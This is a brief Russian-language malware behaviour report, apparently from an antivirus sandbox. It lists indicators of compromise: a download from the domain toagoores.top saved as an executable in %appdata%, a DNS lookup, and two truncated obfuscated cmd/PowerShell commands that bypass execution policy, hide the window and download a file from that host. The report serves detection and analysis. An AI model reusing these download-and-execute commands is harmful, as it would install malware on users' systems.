Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^erSH^Ell.EXE -EX^EcuTIonPO^lI^cy bY^pass -noProfI^lE -^WiNd^Ows^tyLe hId^DE^N ^(^NeW-^objEc^T ^Sy^s^te^M.^net.W^ebc^L^IEN^T)^.dOWnLOad^fil^E('http://toagoores.top/read.p...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "Pow^erSH^Ell.EXE -EX^EcuTIonPO^lI^cy bY^pass -noProfI^lE -^WiNd^Ows^tyLe hId^DE^N ^(^NeW-^objEc^T ^Sy^s^te^M.^net.W^ebc^L^IEN^T)^.dOWnLOad^fil^E('http://toagoores.top/read.p...' (со скрытым окном)